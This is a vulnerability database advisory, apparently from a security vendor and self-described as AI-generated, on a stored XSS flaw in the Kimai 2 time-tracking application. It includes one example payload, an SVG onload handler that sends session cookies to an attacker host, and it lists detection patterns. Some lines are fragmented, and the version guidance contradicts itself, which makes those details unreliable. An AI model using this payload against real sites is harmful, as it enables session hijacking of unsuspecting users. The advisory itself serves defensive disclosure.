
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2019-25317 is a persistent (stored) cross-site scripting (XSS) vulnerability in Kimai 2, an open-source time-tracking application. It affects Kimai versions up to and including 1.1, allowing authenticated attackers with low privileges to inject malicious SVG-based XSS payloads into timesheet description fields. The vulnerability was originally fixed on July 14, 2019 via pull request #962 and formally published to the GitHub Advisory Database on February 11, 2026 (GHSA-9278-6hcj-2p4j). It carries a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory).
The root cause is improper neutralization of user-controlled input in the timesheet description field before it is rendered in the web page (CWE-79). Kimai 2 failed to sanitize or encode SVG-based payloads submitted to the description field, allowing stored JavaScript to execute in the browsers of other users who view the affected timesheet entries. The fix was applied in src/Twig/MarkdownExtension.php, indicating the vulnerability resided in the Twig template rendering layer where markdown content was output without adequate escaping. A public proof-of-concept exploit is available on Exploit-DB (EDB-47286) (GitHub Advisory, Kimai PR #962).
Successful exploitation allows an authenticated attacker to execute arbitrary JavaScript in the browsers of other Kimai users who view the poisoned timesheet entries. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of victims, and access to sensitive timesheet or project data. Availability is not impacted, but confidentiality and integrity of user sessions and data are at risk (GitHub Advisory).
A public proof-of-concept exploit is available on Exploit-DB (https://www.exploit-db.com/exploits/47286), demonstrating SVG-based XSS payload injection into timesheet descriptions. There is no evidence of active in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.009% (1st percentile), indicating a very low probability of exploitation in the near term. This CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).
onload event handler (e.g., <svg onload="fetch('https://attacker.com/steal?c='+document.cookie)">) to exfiltrate session cookies.<svg, onload=, onerror=) in POST request bodies.javascript:), or HTML event attributes (onload, onerror, onclick).Upgrade Kimai to version 1.1 or later, which includes the fix applied in commit a0e8aa3 that adds proper output encoding in src/Twig/MarkdownExtension.php (Kimai PR #962). As a complementary measure, implement a Content Security Policy (CSP) header that restricts inline script execution and disallows loading resources from untrusted origins. Administrators should also audit existing timesheet descriptions for SVG or JavaScript payloads and sanitize any suspicious content. Restricting timesheet description editing to trusted users can reduce the attack surface until patching is complete (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."